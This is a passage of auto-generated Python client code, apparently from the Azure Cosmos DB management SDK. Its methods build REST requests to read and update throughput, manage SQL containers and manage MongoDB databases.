query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_sql_database_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/settings/throughput'}
def _update_sql_database_throughput_initial(
self, resource_group_name, account_name, database_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_sql_database_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_sql_database_throughput(
self, resource_group_name, account_name, database_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update RUs per second of an Azure Cosmos DB SQL database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_sql_database_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_sql_database_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/settings/throughput'}
def list_sql_containers(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Lists the SQL container under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of SqlContainer
:rtype:
~azure.mgmt.cosmosdb.models.SqlContainerPaged[~azure.mgmt.cosmosdb.models.SqlContainer]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_sql_containers.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.SqlContainerPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_sql_containers.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/containers'}
def get_sql_container(
self, resource_group_name, account_name, database_name, container_name, custom_headers=None, raw=False, **operation_config):
"""Gets the SQL container under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param container_name: Cosmos DB container name.
:type container_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SqlContainer or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.SqlContainer or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_sql_container.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'containerName': self._serialize.url("container_name", container_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SqlContainer', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_sql_container.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/containers/{containerName}'}
def _create_update_sql_container_initial(
self, resource_group_name, account_name, database_name, container_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_sql_container_parameters = models.SqlContainerCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_sql_container.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'containerName': self._serialize.url("container_name", container_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_sql_container_parameters, 'SqlContainerCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SqlContainer', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_update_sql_container(
self, resource_group_name, account_name, database_name, container_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or update an Azure Cosmos DB SQL container.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param container_name: Cosmos DB container name.
:type container_name: str
:param resource: The standard JSON format of a container
:type resource: ~azure.mgmt.cosmosdb.models.SqlContainerResource
:param options: A key-value pair of options to be applied for the
request. This corresponds to the headers sent with the request.
:type options: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns SqlContainer or
ClientRawResponse<SqlContainer> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.SqlContainer]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.SqlContainer]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_update_sql_container_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
container_name=container_name,
resource=resource,
options=options,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('SqlContainer', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_update_sql_container.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/containers/{containerName}'}
def _delete_sql_container_initial(
self, resource_group_name, account_name, database_name, container_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_sql_container.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'containerName': self._serialize.url("container_name", container_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_sql_container(
self, resource_group_name, account_name, database_name, container_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB SQL container.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param container_name: Cosmos DB container name.
:type container_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_sql_container_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
container_name=container_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_sql_container.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/containers/{containerName}'}
def get_sql_container_throughput(
self, resource_group_name, account_name, database_name, container_name, custom_headers=None, raw=False, **operation_config):
"""Gets the RUs per second of the SQL container under an existing Azure
Cosmos DB database account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param container_name: Cosmos DB container name.
:type container_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_sql_container_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'containerName': self._serialize.url("container_name", container_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_sql_container_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/containers/{containerName}/settings/throughput'}
def _update_sql_container_throughput_initial(
self, resource_group_name, account_name, database_name, container_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_sql_container_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'containerName': self._serialize.url("container_name", container_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_sql_container_throughput(
self, resource_group_name, account_name, database_name, container_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update RUs per second of an Azure Cosmos DB SQL container.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param container_name: Cosmos DB container name.
:type container_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_sql_container_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
container_name=container_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_sql_container_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/containers/{containerName}/settings/throughput'}
def list_mongo_db_databases(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Lists the MongoDB databases under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of MongoDBDatabase
:rtype:
~azure.mgmt.cosmosdb.models.MongoDBDatabasePaged[~azure.mgmt.cosmosdb.models.MongoDBDatabase]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_mongo_db_databases.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.MongoDBDatabasePaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_mongo_db_databases.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases'}
def get_mongo_db_database(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Gets the MongoDB databases under an existing Azure Cosmos DB database
account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: MongoDBDatabase or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.MongoDBDatabase or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_mongo_db_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('MongoDBDatabase', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_mongo_db_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}'}
def _create_update_mongo_db_database_initial(
self, resource_group_name, account_name, database_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_mongo_db_database_parameters = models.MongoDBDatabaseCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_mongo_db_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_mongo_db_database_parameters, 'MongoDBDatabaseCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('MongoDBDatabase', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_update_mongo_db_database(
self, resource_group_name, account_name, database_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or updates Azure Cosmos DB MongoDB database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param resource: The standard JSON format of a MongoDB database
:type resource: ~azure.mgmt.cosmosdb.models.MongoDBDatabaseResource
:param options: A key-value pair of options to be applied for the
request. This corresponds to the headers sent with the request.
:type options: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns MongoDBDatabase or
ClientRawResponse<MongoDBDatabase> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.MongoDBDatabase]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.MongoDBDatabase]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_update_mongo_db_database_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
resource=resource,
options=options,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('MongoDBDatabase', response)
if raw:
